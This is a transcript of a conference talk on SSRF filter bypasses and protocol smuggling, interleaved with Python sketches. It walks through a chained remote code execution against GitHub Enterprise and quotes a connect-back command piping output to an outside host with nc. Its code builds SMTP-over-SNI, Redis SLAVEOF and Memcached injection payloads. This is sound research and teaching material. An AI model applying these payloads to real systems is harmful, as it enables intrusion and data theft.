>>Thanks for coming. This talk is about research on web security. SSRF is an attack technique against web applications. The concept of SSRF first appeared about 10 years ago, and since then many exploitation and mitigation techniques have been developed. In this talk I will show you some of my findings. These findings not only bypass existing SSRF protections but also lead to critical remote code execution. We will also go through case studies of real-world applications and a demo on GitHub Enterprise. OK, if you feel like going to other talks, like Hacking Democracy or Open Source Safe Cracking Robots, this is your last chance. [audience laughs] OK, let's go.
Hi again, I'm Orange from Taiwan. Taiwan is a country in Asia, and we speak Mandarin Chinese. As you can see, my English is not good, so I've prepared several notes for this talk. I will try my best. Thank you for bearing with me. I just got my master's degree and work at a security startup. I can say that DEVCORE is the most professional red team in Taiwan. I'm a vulnerability researcher at DEVCORE. I can do reversing stuff and I know exploitation, but my favorite is still web security. [crowd member whoops] [speaker chuckles] Nice. [audience chuckles] I'm also a member of CHROOT and HITCON. CHROOT is the earliest hacker group in my country, and we also host HITCON, the largest hacker conference in Taiwan. By the way, HITCON 2017 will take place on August 24 and 25. You're welcome to join us. Here is a brief introduction of myself. I am a speaker, CTF player, and bug bounty hunter. In web security I love server-side vulnerabilities more than client-side ones, because taking control of a server is more fun for me. So I love remote code execution in particular. You can see the vendors I have reported RCEs to: Facebook, GitHub, Apple, Uber, and so on. Someone told me to always put cats in your slides [audience laughs].
So that you can catch everyone's eye and never fail your talk. [audience chuckles] Nobody has cats, right? This is our agenda today. Our goal is to make SSRF great again. [audience laughs and cheers] First I will introduce SSRF and start with some quick, fun examples. Next I will talk about my findings: a new attack surface for SSRF bypasses, and a new attack vector for protocol smuggling that enhances existing SSRFs. By combining them we can achieve more advanced exploitation and compromise the server. Of course, we will have case studies and a demo.
What is SSRF? OK, I know this is DEF CON, not SSRF 101, so I don't need a lot of trivial introduction. I suppose you all know what SSRF is. In a word, SSRF lets you bypass the firewall and touch the intranet, so the attack surface depends on how big the intranet is. The larger the enterprise, the more powerful SSRF becomes. For example, in a big company there are lots of Struts2, Elasticsearch, and Redis instances you can pwn through SSRF. Next, protocol smuggling, which makes SSRF even more powerful. There are several ways to smuggle protocols in an SSRF, and each has its limitations. So which protocols are good to smuggle? I have a list here that you can check. OK, the introduction is over. Short, right?
Before we start our topic, I want to make a survey. How many people use Python? Please raise your hand. Wow. OK. DEF CON hasn't come. [audience laughs] I want to ask you a question: if you want to access the web with Python, which library do you prefer? [unclear responses from audience] Nice, nice. I think most Python folks use requests, urllib, or urllib2. Let's start with a fun example. Think about this URL; the red square is a space. Which address is Python going to access? I'll give you 5 seconds to make up your mind. 1, 2, 3, 4, 5, OK. Here's the answer. [audience laughs] Even Python's built-in libraries treat the same URL differently.
urllib accesses the blue part, urllib2 accesses the orange part, and requests accesses the green part. This sounds crazy. Python is really, really hard. I don't understand Python. [audience chuckles]
Another showcase. It is easy to understand that if there is a CRLF injection in HTTP, we can smuggle other protocols. But as you can see, for security reasons most SMTP servers break the HTTP connection: if the server finds an HTTP pattern such as GET / or POST / in the incoming request, it cuts off the connection. SMTP hates the HTTP protocol, and it seems unexploitable. Somebody might say, "You can use Gopher." We are not going to talk about Gopher today. Gopher is good, but what if there is no Gopher support? Gopher is too easy, and not all programming languages support Gopher. But in an SSRF, HTTP always exists, so we focus our attack scenarios on HTTP and HTTPS. Let's smuggle the SMTP protocol over HTTPS. HTTPS is a secure protocol, so the payload will be encrypted. So how? Let's think about a question: what isn't encrypted in an SSL handshake? Does anyone have an idea? OK. The answer is SNI, Server Name Indication. We can send an HTTPS request and abuse the SNI to bypass the limitation. Smuggling SMTP over SSL SNI: I think no one has mentioned this before. During the SSL handshake, the Client Hello message exchanges metadata between the client and the server, and the SNI extension in this message specifies the remote hostname. So what if we can tamper with the hostname? Yes, look at the yellow square. This space makes it possible to embed a malicious payload in a domain name, so with the space we can now inject newlines and data into the domain name. Why does this work? We use a trick in Linux glibc, which we will introduce later. The data separated by newlines is the SMTP protocol we smuggle. Our commands simply make the SMTP server send the mail. This is the request and the response.
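To make the point that SNI travels unencrypted concrete, here is a minimal Python sketch that only builds the bytes of a TLS server_name extension as laid out in RFC 6066. It does not open a TLS connection, and whether a given TLS client accepts such a hostname is a separate question. The SMTP commands, the addresses, and the junk "127.0.0.1 " prefix and ":465" suffix are hypothetical placeholders, not the payload from the slides.

```python
import struct

def sni_extension(hostname: bytes) -> bytes:
    """Encode a TLS server_name extension (RFC 6066) holding a single host_name."""
    # ServerName entry: name_type host_name(0), 2-byte length, raw hostname bytes
    entry = struct.pack("!BH", 0, len(hostname)) + hostname
    # ServerNameList: 2-byte length prefix followed by the entries
    server_name_list = struct.pack("!H", len(entry)) + entry
    # Extension header: extension_type server_name(0), 2-byte extension_data length
    return struct.pack("!HH", 0, len(server_name_list)) + server_name_list

# Hypothetical SMTP commands; the addresses are placeholders.
smtp_commands = [
    b"HELO attacker.example",
    b"MAIL FROM:<attacker@example.com>",
    b"RCPT TO:<victim@example.com>",
    b"DATA",
    b"Subject: smuggled over SNI",
    b"",
    b"hello",
    b".",
    b"QUIT",
]
# A junk first line ("127.0.0.1 ") and a junk last line (":465") wrap the commands.
payload_host = b"127.0.0.1 \r\n" + b"\r\n".join(smtp_commands) + b"\r\n:465"
ext = sni_extension(payload_host)

# The hostname is sent in cleartext inside the ClientHello, so a server that
# reads the raw bytes line by line sees each smuggled command on its own line.
lines = ext.split(b"\r\n")
for line in lines[1:-1]:
    print(line.decode())
```

Only the first and last "lines" contain binary framing or junk. Everything in between is what a line-oriented SMTP server would try to execute.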
You can see there is no HTTP pattern such as GET / or POST / here, and the server recognizes our payload as valid commands. Uh- [unclear] [audience laughs and claps] So we exploit the- [audience chuckles sympathetically] So we exploit it successfully. These two examples are interesting, right? OK, let's go to our main content: make SSRF great again. Today we've prepared four sections to make SSRF great again.
The first part is URL parsing issues. This is all about inconsistencies between the URL parser and the URL requester. It is common to fix an SSRF by validating the URL, but validating a URL is hard. Why? URLs are specified in RFC 3986, but it is only a specification with a few implementation guidelines. WHATWG is a community trying to define an implementation model based on the RFC, but in practice programming languages still prefer their own implementations, so there are lots of mistakes in URL parsers. How does the RFC define a URL? These are the URL components defined in RFC 3986. There are five parts in total: scheme, authority, path, query, and fragment. Today we will cover the scheme, authority, and path. For the scheme, we only care about attack scenarios under HTTP and HTTPS. The authority and path are complex, and we will look at them later. Finally, the query and fragment. Umm, I don't care. [audience chuckles] This is the big picture of the problems we will mention today. We classify URL parsing issues into three types: port injection, host injection, and path injection. Protocol smuggling splits the same way: smuggling on the path, smuggling on the host, and smuggling on SNI. Consider the following code in PHP. The code simply fetches the user-provided URL. To prevent SSRF, the developer uses the function parse_url to check whether the host and port are valid. So if you provide 127.0.0.1 and port 81, you will not pass the check.
But how about this URL? Everyone knows the colon is the separator between the host and the port. The RFC defines the spec but doesn't say how to implement it. So is the colon interpreted from the front or from the back? Interestingly, for the URL http://127.0.0.1:11211:80/, the PHP function parse_url recognizes 80 as the port number, but PHP readfile actually fetches port 11211. Both parse_url and readfile are built-in PHP functions, but their behaviors are very different, so we can use this inconsistency to bypass the check. And how about this URL: http://google.com#@evil.com/? This is another interesting test. parse_url recognizes google.com as the hostname, but readfile fetches evil.com. This URL perfectly bypasses all the restrictions. But are you curious which behavior is the right one? Let's take a little survey again. If you think google.com is the right one, please raise your hand. OK, OK. [chuckles] I think the domain evil.com already told you the answer. Several programming languages suffer from this issue, like PHP, Java, cURL, and Python. According to the RFC, the authority part is preceded by a double slash and terminated by the next slash, question mark, or number sign. So the correct authority part is google.com.
If you don't like PHP, let's exploit cURL. cURL is a world-famous library with lots of language bindings. Think about how cURL parses this URL: http://foo@evil.com:80@google.com/. Most parsers recognize google.com as the hostname, but cURL fetches evil.com. This inconsistency between the parser and cURL also leads to security problems: if an application uses one library to parse and check the URL but fetches the resource with cURL, it might be vulnerable.
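The parser/requester disagreements above can be reproduced with a short Python sketch. The three helper functions are hypothetical toy models of a "checker" and a "requester" (they are not PHP's parse_url, readfile, or cURL's code). Python's own urllib.parse.urlsplit serves as the checker for the host cases: it ends the authority at '#' as RFC 3986 requires and takes the host after the last '@'.

```python
from urllib.parse import urlsplit

def naive_host(url: str, take_first_at: bool = False) -> str:
    """Hypothetical requester: ends the authority only at '/', ignoring '?' and '#'."""
    authority = url.split("//", 1)[1].split("/", 1)[0]
    if take_first_at and "@" in authority:
        hostinfo = authority.split("@", 1)[1]    # userinfo ends at the FIRST '@'
    else:
        hostinfo = authority.rsplit("@", 1)[-1]  # userinfo ends at the LAST '@'
    return hostinfo.split(":", 1)[0]

def port_after_last_colon(authority: str) -> int:
    """Hypothetical checker: reads the port after the last ':'."""
    return int(authority.rsplit(":", 1)[1])

def port_after_first_colon(authority: str) -> int:
    """Hypothetical requester: reads the port after the first ':'."""
    return int(authority.split(":")[1])

# Port injection: checker and requester disagree on which colon starts the port.
print(port_after_last_colon("127.0.0.1:11211:80"), port_after_first_colon("127.0.0.1:11211:80"))

# Host injection: the checker sees google.com, the toy requester connects elsewhere.
for url, first_at in [("http://google.com#@evil.com/", False),
                      ("http://foo@evil.com:80@google.com/", True)]:
    print(url, "checker:", urlsplit(url).hostname, "requester:", naive_host(url, first_at))
```

Whichever component is "right", the bug appears as soon as the check and the fetch use two different answers.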
This is very common in PHP, because PHP's built-in HTTP library sucks. [audience laughs] After I found this problem, I quickly reported it to the cURL security team, and they patched it in no time. But while checking the patch, I found we could bypass it simply by adding a space. [audience laughs] This is not entirely cURL's fault; it also relies on a feature of Linux glibc, which we will talk about later. However, I think cURL could be more strict, so I reported it again, but this time the cURL team replied: "cURL doesn't verify that the URL is 100 percent syntactically correct. It is instead documented to work with URLs and assumes that you pass correct input." cURL considers this the programmer's problem, so it won't be fixed, but the previous patch is still applied in cURL 7.54.
The next attack vector is about a Unicode failure in Node.js. Look at the following code. To prevent directory traversal, the code checks that there is no ".." in the path, so you can't access files outside the sandbox directory. The question is: if there is a passwd file in the web root, how do you access it? Does anyone have an idea? OK, the answer is to use the Unicode symbol FULLWIDTH LATIN CAPITAL LETTER N (U+FF2E). This URL actually accesses the passwd file under the web root. Let's explain why. JavaScript internally processes strings as UCS-2, so the Unicode symbol N is represented as 0xFF2E. The tricky thing is that when the HTTP module writes the path into its buffer, it falls back to a one-byte encoding and the FF is stripped. The remaining part is 0x2E, the ASCII code of a dot, so the server sees ../ as the parent directory, and we can download the passwd file in the web root from the remote server. The double full-width N is the new ".." in the Node.js HTTP module. What the hell? [audience laughs and claps] I have nothing to say. [audience laughs] This technique can also be applied to protocol smuggling. Originally, the HTTP module protects users from CRLF injection.
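The byte-level effect described above can be simulated in Python. This is not Node.js code and does not call Node's http module. It only models a lossy one-byte encoding that keeps the low byte of each UTF-16 code unit. The sandbox path is a hypothetical example.

```python
def one_byte_truncate(text: str) -> bytes:
    """Keep only the low byte of each UTF-16 code unit, i.e. a lossy one-byte encoding."""
    units = text.encode("utf-16-be")
    return bytes(units[i + 1] for i in range(0, len(units), 2))

# Hypothetical sandboxed path using U+FF2E (FULLWIDTH LATIN CAPITAL LETTER N) twice.
path = "/sandbox/\uff2e\uff2e/passwd"
print(".." in path)               # False: the naive traversal filter is satisfied
print(one_byte_truncate(path))    # b'/sandbox/../passwd' after truncation

# The same truncation turns U+FF0D / U+FF0A into CR / LF.
print(one_byte_truncate("\uff0d\uff0a"))  # b'\r\n'
```

The filter inspects the Unicode string, while the network sees the truncated bytes. That gap is the whole bug.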
The HTTP module percent-encodes newlines, so if we inject newlines into the path, our smuggling fails. But we can break the protection with the Unicode symbols U+FF0D and U+FF0A, the full-width hyphen-minus and the full-width asterisk. The HTTP module cannot find any newlines in the path, but the encoding still falls back and strips the FF, so our protocol smuggling works again.
The next section is about features of Linux glibc. First, a weird feature in the NSS function gethostbyname. In the glibc source there is a comment: "Convert an ascii string into an encoded domain name as per RFC1035." RFC 1035 describes the details of the domain name system and its protocol, but it is surprising that gethostbyname performs such a conversion at all. In this C program, the result for or\097nge.tw is the same as the result for orange.tw. I roughly grepped the Linux man pages but didn't find anything documenting this weird feature. I think it may be useful for bypassing some blacklist protections. The source code also shows that gethostbyname removes a backslash that is not followed by a digit, which is a good way to obfuscate your domain name with lots of backslashes. I printed out the host to show that the unescaping is done by gethostbyname. The next feature is about Linux getaddrinfo. getaddrinfo strips trailing rubbish that follows a valid IP address and a whitespace. In this C program, the domain "127.0.0.1 foo" is valid and resolves to 127.0.0.1. getaddrinfo is a very fundamental function in Linux; for example, gethostbyname in Python's socket module relies on getaddrinfo. So the CRLF and FOO in the domain name will be removed. This makes it possible to do more complex attacks based on a polluted domain name. OK, let's talk about how to exploit NSS features in URL parsers.
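The two glibc behaviours just described can be emulated in Python to see what a blacklist check is up against. Both functions are hypothetical, simplified models of the observed behaviour, not glibc's implementation. For example, real RFC 1035 parsing rejects some malformed escapes that this model accepts.

```python
import ipaddress
import re
from typing import Optional

def unescape_rfc1035(name: str) -> str:
    """Simplified model of the escape handling described for gethostbyname:
    a backslash plus three decimal digits becomes that character, and a backslash
    before anything else is dropped while the character is kept."""
    out = []
    i = 0
    while i < len(name):
        if name[i] == "\\" and i + 1 < len(name):
            digits = name[i + 1:i + 4]
            if len(digits) == 3 and digits.isascii() and digits.isdigit():
                out.append(chr(int(digits)))
                i += 4
            else:
                out.append(name[i + 1])
                i += 2
        else:
            out.append(name[i])
            i += 1
    return "".join(out)

def strip_trailing_rubbish(host: str) -> Optional[str]:
    """Model of the getaddrinfo behaviour described in the talk: a valid dotted IPv4
    address followed by whitespace is accepted and everything after it is ignored."""
    match = re.match(r"(\S+)\s", host)
    if match is None:
        return None
    try:
        return str(ipaddress.IPv4Address(match.group(1)))
    except ValueError:
        return None

print(unescape_rfc1035(r"or\097nge.tw"))           # orange.tw
print(unescape_rfc1035(r"\o\r\a\n\g\e.tw"))        # orange.tw
print(strip_trailing_rubbish("127.0.0.1 foo"))     # 127.0.0.1
print(strip_trailing_rubbish("127.0.0.1\r\nFOO"))  # 127.0.0.1
```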
URL parsers might recognize the whole part as the hostname, but the HTTP request still goes to 127.0.0.1. The %2509 one is special and needs more explanation. Why does double encoding work? After digging into the source, we found that libraries such as cURL decode the URL twice. So these patterns are useful for breaking some subdomain checks.
Next, exploiting NSS features for protocol smuggling. First, why does this work? Because HTTP/1.1 requires a Host header, and most libraries embed the hostname into the HTTP request. So if we can inject newlines into the hostname, we can smuggle protocols over HTTP. For example, data with newlines in the hostname will be recognized as a valid Redis command. You can see we smuggle the SLAVEOF command over HTTP. By the way, SLAVEOF is a nice command that makes Redis create outbound traffic, which is a useful trick when you are facing a blind SSRF. SNI injection is the same idea. During the SSL handshake, the SNI extension embeds the hostname in the Client Hello message, so if we inject newlines into the hostname, we can smuggle commands into the handshake, which is not encrypted. Let's break the patch for Python CVE-2016-5699. It is a CRLF injection in the putheader function of the httplib module. It affects both urllib and urllib2, because they use httplib to construct their HTTP requests. The patch uses a regular expression to ensure there are no newlines in the header value; otherwise it raises an error. But Python makes an exception for a tab or space following the newline, so we can break the patch by adding a space. You can see that with the space, urllib and urllib2 are vulnerable again. But this brings a new problem: there is one more leading space in our payload. Do protocols still work that way? The answer is yes, thanks to Redis and Memcached. As you can see, the SLAVEOF command starts with a leading space, but the server still replies OK.
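The space-after-newline bypass can be checked directly against the validation pattern. The regular expression below is, as far as we know, the same one CPython's http.client uses to reject header values since the CVE-2016-5699 fix. It is copied here rather than imported, because the stdlib attribute is private. The Host values are hypothetical, with attacker.example standing in for a server you control.

```python
import re
from urllib.parse import unquote

# LF is illegal unless followed by space/tab; CR is illegal unless followed by space/tab/LF.
is_illegal_header_value = re.compile(rb"\n(?![ \t])|\r(?![ \t\n])").search

rejected = b"127.0.0.1\r\nSLAVEOF attacker.example 6379\r\n:6379"
accepted = b"127.0.0.1\r\n SLAVEOF attacker.example 6379\r\n :6379"

print(bool(is_illegal_header_value(rejected)))  # True: would raise in http.client
print(bool(is_illegal_header_value(accepted)))  # False: looks like header folding

# A line-based server that ignores leading spaces sees a clean SLAVEOF command.
print([line.strip() for line in accepted.split(b"\r\n")])

# %2509 survives one round of decoding as %09 and becomes a tab after a second one.
print(repr(unquote(unquote("127.0.0.1%2509foo.google.com"))))
```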
Redis and Memcached strip the leading space, so our exploit works again. The next attack vector is about the IDNA standard. IDNA defines how Unicode is used in the domain name system. There are two primary versions: IDNA 2003 and IDNA 2008. IDNA 2008 is too strict, so most parsers follow IDNA 2003 with UTS #46 transitional processing. IDNA supports lots of weird Unicode mappings. For example, circled letters are recognized as valid letters in a domain name, and the Unicode ZERO WIDTH JOINER (U+200D) is removed under IDNA 2003 with UTS #46 transitional processing. So if the parser and the requester adopt different IDNA standards, there may be a security problem. A very fun example is LATIN SMALL LETTER SHARP S (ß). This is a JavaScript example you can run in your browser console. You can see the symbol lowercased is still itself, but uppercased it becomes a double capital S, and the redirect goes to wordpress.com. This is useful for breaking some blacklists, and we will give a real case study later.
OK, cat studies. [audience laughs] This is not a typo: C-A-T studies. Let's study some real-world cases. WordPress is a very famous web application, and it has received a lot of attention on SSRF, but we still found three different ways to bypass its protections. The bugs were reported several months ago but still aren't patched. For the responsible disclosure process, is DEF CON heaven? [laughs] I will use MyBB as my case study instead. However, these techniques are very general, so I think you can use them anywhere. This table shows the components WordPress, vBulletin, and MyBB use to check a URL. The main concept of the bypass is finding different behaviors among the parser, the DNS checker, and the requester. If you find one, you can bypass the restriction. OK, this is the source of MyBB. The first bypass is not a new trick: it is a time-of-check to time-of-use problem.
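The IDNA mappings described earlier (sharp S, circled letters, zero width joiner) can be observed with Python's built-in "idna" codec, which implements IDNA 2003 (nameprep) rather than IDNA 2008. This needs no third-party package. The blocklist at the end is a hypothetical example of a naive string comparison.

```python
samples = [
    "wordpre\u00df.com",                         # U+00DF LATIN SMALL LETTER SHARP S
    "\u24d6\u24de\u24de\u24d6\u24db\u24d4.com",  # circled letters g o o g l e
    "goo\u200dgle.com",                          # U+200D ZERO WIDTH JOINER inside the label
]
for host in samples:
    print(ascii(host), "->", host.encode("idna"))

# The case-mapping behaviour from the browser demo, reproduced with Python strings.
print("\u00df".lower() == "\u00df", "\u00df".upper())  # True SS

# A naive blocklist compares raw strings; a requester that applies IDNA 2003 does not.
blocklist = {"wordpress.com"}
raw = "wordpre\u00df.com"
print(raw in blocklist, raw.encode("idna").decode("ascii") in blocklist)  # False True
```

A checker that compares raw Unicode strings and a requester that normalizes through IDNA 2003 can reach opposite conclusions about the same host.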
MyBB uses parse_url to check whether the hostname, scheme, and port are valid, and uses gethostbyname to resolve the domain and ensure the address is not in the blacklist. If the URL passes all checks, MyBB fetches the resource with cURL. The problem is that the state at time of check and the state at time of use can differ. So we set up a DNS server and let the first query return an address that is not blacklisted, such as 1.2.3.4. After we pass the check, MyBB fetches the URL and queries the domain again, and at that moment we change the DNS record to 127.0.0.1. The state at check is 1.2.3.4, but the state at use is 127.0.0.1, so we bypass the protection. The next bypass is about IDNA support. cURL is a very intelligent library that can automatically convert an internationalized domain name and resolve it to an IP address, but PHP gethostbyname can't. This inconsistency also leads to an SSRF bypass. You can see that for this URL, gethostbyname returns false, as it should, but cURL still fetches 127.0.0.1. The last bypass is the inconsistency between the parser and the requester. We mentioned several URL parsing bugs before, and by using them we can bypass all the restrictions. For the number sign bug, parse_url recognizes google.com as the hostname, but cURL fetches 127.0.0.1. This is handy but has been fixed in PHP 7.0.13. If you don't like PHP, you can still exploit the bug in cURL, with the same result. That bug is fixed in cURL 7.54, but most packages haven't kept up. For example, libcurl in the latest version of Ubuntu is still 7.52.1, so I think most systems are still under threat. Or you can use the space technique we mentioned before, which cURL won't fix. OK, let's look at our last case study: GitHub Enterprise.
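The DNS-rebinding time-of-check to time-of-use gap described for MyBB can be sketched with a fake resolver, so no real DNS is involved. RebindingResolver and check_then_fetch are hypothetical names. The function returns the address the fetcher would connect to instead of making a request.

```python
import ipaddress

class RebindingResolver:
    """Hypothetical attacker-run DNS: the first answer passes the check, later ones do not."""
    def __init__(self, first_answer: str, later_answer: str) -> None:
        self.first_answer = first_answer
        self.later_answer = later_answer
        self.queries = 0

    def resolve(self, host: str) -> str:
        self.queries += 1
        return self.first_answer if self.queries == 1 else self.later_answer

def is_public(ip: str) -> bool:
    return ipaddress.ip_address(ip).is_global

def check_then_fetch(host: str, resolver: RebindingResolver) -> str:
    """Vulnerable pattern: validate one lookup, then let the fetcher resolve again."""
    if not is_public(resolver.resolve(host)):  # time of check
        raise PermissionError("blocked")
    return resolver.resolve(host)               # time of use: a second, fresh lookup

resolver = RebindingResolver("1.2.3.4", "127.0.0.1")
print(check_then_fetch("rebind.attacker.example", resolver))  # 127.0.0.1
```

The check itself is fine. The flaw is that its result is thrown away and the name is resolved again.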
GitHub Enterprise is the on-premises version of GitHub, which lets you deploy the whole GitHub service in your private network. Most of the code is written in Ruby on Rails and obfuscated. The code base of GitHub Enterprise seems to be the same as GitHub.com. Seems. And there is an environment, whatever, that lets you switch the mode from Enterprise to the .com version. If you want to study security on GitHub, I highly recommend GitHub Enterprise. [audience murmurs] In this case I will show you a beautiful exploitation that chains vulnerabilities into a critical remote code execution. It also won Best Report in GitHub's 3rd Bug Bounty anniversary. Why prey on GitHub Enterprise? I noticed there is an interesting feature called webhooks. A webhook lets you define a custom HTTP callback that fires when a specific git commit occurs. GitHub uses the Ruby gem Faraday to fetch external resources and prevents users from SSRF with faraday-restrict-ip-addresses. The gem seems to be just a blacklist and can be bypassed with 0; in Linux, 0 stands for localhost. OK, we got SSRF now. However, we still can't do anything. Why? There are several limitations in this SSRF. It only allows the HTTP and HTTPS schemes, and we can't change the scheme with a 302 redirect. It is also a POST-based SSRF, and we can't even control the headers or the POST data. Most importantly, there is no CRLF injection in this SSRF. We have an SSRF, but with lots of limitations. My next idea was: is there any internal service we can leverage? It takes a bit of work. There are several services inside, each implemented in a different language, such as C, C++, Go, and Python. After a couple of days of digging, I found a service called Graphite on port 8000. Graphite is a highly scalable, real-time graphing system. Of course, we found another SSRF here.
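Why "0" slips past an IP blacklist can be shown with a small Python model of the classic inet_aton number forms (a, a.b, a.b.c, a.b.c.d), in which "0" means 0.0.0.0. On Linux, connecting to 0.0.0.0 reaches the local host. The denylist below is a hypothetical example and is NOT the actual list used by the Faraday gem. inet_aton_like is likewise a simplified, decimal-only model.

```python
import ipaddress
from typing import Optional

# Hypothetical denylist for illustration; it is not the Faraday gem's actual list.
DENYLIST = [ipaddress.ip_network(cidr) for cidr in
            ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16")]

def inet_aton_like(host: str) -> Optional[ipaddress.IPv4Address]:
    """Decimal-only model of the classic inet_aton forms a, a.b, a.b.c and a.b.c.d,
    where the last number fills all remaining bytes."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(p.isascii() and p.isdigit() for p in parts):
        return None
    *head, last = (int(p) for p in parts)
    free_bytes = 4 - len(head)
    if any(n > 255 for n in head) or last >= 256 ** free_bytes:
        return None
    value = 0
    for n in head:
        value = value * 256 + n
    return ipaddress.IPv4Address(value * 256 ** free_bytes + last)

def is_denied(host: str) -> bool:
    ip = inet_aton_like(host)
    return ip is not None and any(ip in net for net in DENYLIST)

for host in ("127.0.0.1", "127.1", "0"):
    print(host, "->", inet_aton_like(host), "denied:", is_denied(host))
```

A denylist has to anticipate every spelling and every special range. Missing 0.0.0.0/8 is enough here.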
The second SSRF is simple: Graphite just fetches the URL given in a GET request. So we have two SSRFs now, and we can combine them into an SSRF execution chain. Cool, right? And we've successfully turned a POST-based SSRF into a GET-based SSRF. The third bug is a CRLF injection in Graphite. As you can see, the second SSRF is implemented with Python httplib, and earlier we mentioned that httplib suffers from CRLF injection. So with the CRLF injection, we can smuggle protocols in this SSRF execution chain. The next problem is: which protocol do we smuggle? I spent lots of time figuring out what vulnerabilities could be triggered if I could control Redis or Memcached. While reviewing the source, I was curious: why can GitHub store Ruby objects in Memcached? After some digging, I found GitHub uses a Ruby gem to store the cache, and the cache is wrapped by Marshal. That is good news, because everyone knows Marshal is dangerous. So our goal is clear: we use our SSRF execution chain to store a malicious Marshal-serialized Ruby object in Memcached. The next time GitHub fetches the cache, the Ruby gem deserializes the data automatically, and we get remote code execution. Here is the final payload. There are several parts. The red part is the first SSRF bypass in the webhook, combined with the blue part, the second SSRF. The yellow part is the Memcached protocol we smuggle, and the final blue part is our malicious serialized object. In this case we execute the command id | nc orange.tw 12345. In this case I won 12,500 dollars from GitHub. [audience applauds] OK, OK, I have no time. [chuckles] I think this is a very critical real-world case of an SSRF execution chain combined with protocol smuggling. OK, let's watch the demo video: Remote Code Execution on GitHub Enterprise. OK, this is GitHub Enterprise. Very similar to GitHub.com, right? The version is 2.8.6. Eh? Oh yeah.
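As a sketch of the smuggled Memcached step in the chain described above, the snippet builds a Memcached text-protocol "set" command and percent-encodes it for injection through the CRLF bug. The key and value are hypothetical placeholders. The actual exploit stored a Marshal-serialized Ruby object under a cache key that GitHub Enterprise later read back, and neither the key nor the object is reproduced here.

```python
from urllib.parse import quote

def memcached_set(key: bytes, value: bytes, flags: int = 0, exptime: int = 0) -> bytes:
    """Memcached text-protocol storage command: set <key> <flags> <exptime> <bytes>, then the data block."""
    header = b"set %s %d %d %d\r\n" % (key, flags, exptime, len(value))
    return header + value + b"\r\n"

# Placeholder key and value, for illustration only.
command = memcached_set(b"hypothetical:cache:key", b"<marshal bytes here>")

# A leading CRLF ends the junk HTTP request line, so the memcached server sees
# "set ..." at the start of its own line. Percent-encode it for the injected URL.
injected = quote(b"\r\n" + command, safe="")
print(command)
print(injected)
```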
To add a webhook, we open our repository's settings, click Hooks & services, and add a webhook. OK, here is the callback URL. We open our console, echo hi, list our exploit files, and then load our exploit. Here is our SSRF payload. We pass the payload to GitHub Enterprise, and when we submit it, the SSRF execution chain inserts malicious data into Memcached. OK, we listen on port 12345 and wait for the connect-back. The final step is to trigger the deserialization: we search for a keyword to trigger the RCE. [audience applauds] OK, OK, OK, I have no time. [audience laughs] As you can see, we got a shell. So with this SSRF execution chain and protocol smuggling over Memcached, we can execute arbitrary system commands on the remote server.
Mitigations. How do we prevent such SSRF attacks? From two aspects. At the application layer, connect only to the validated IP, and remember: don't reuse the URL the user provided. At the network layer, use a firewall or network policy to block intranet traffic. There are also projects designed to protect you from SSRF attacks: SafeCurl by fin1te and Advocate by Jordan Milne. OK, we have no time. Thanks to my friends back home, who inspired me to do this research, and thanks to the many people who helped me: Allen, Birdman, and Henry. This is the end of [audience applauds] my presentation. [audience cheers enthusiastically] OK, OK. This is the end of my presentation. If you have further questions, here is my contact information: orange@chroot.org, or you can find me on Twitter at orange_8361. Thanks for staying with me. Thanks. [audience applauds]
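The application-layer mitigation mentioned near the end of the talk (connect by IP, don't reuse the user's URL) can be sketched in Python as "parse once, resolve once, validate every address, then connect to exactly that address". pin_destination and resolve_all are hypothetical names. This is not the API of SafeCurl or Advocate, and a real client would still need to send the original hostname in the Host header and SNI.

```python
import ipaddress
import socket
from typing import Callable, List, Tuple
from urllib.parse import urlsplit

def resolve_all(host: str) -> List[str]:
    """Default resolver: every address getaddrinfo returns for host."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def pin_destination(url: str,
                    resolve: Callable[[str], List[str]] = resolve_all) -> Tuple[str, int, str]:
    """Parse the URL once, resolve once, reject any non-public address, and return
    (ip, port, hostname). The caller should connect to exactly this IP and use the
    hostname only for the Host header / SNI, never re-fetching the raw URL."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("unsupported URL")
    port = parts.port or (443 if parts.scheme == "https" else 80)  # ValueError on junk ports
    addresses = resolve(parts.hostname)
    if not addresses:
        raise ValueError("host does not resolve")
    for address in addresses:
        if not ipaddress.ip_address(address).is_global:
            raise PermissionError(f"{parts.hostname} resolves to non-public {address}")
    return addresses[0], port, parts.hostname

print(pin_destination("http://example.test/", lambda host: ["1.2.3.4"]))
```

Because the same resolved address is both checked and used, a rebinding DNS server gets only one answer, and a second parser never sees the raw URL.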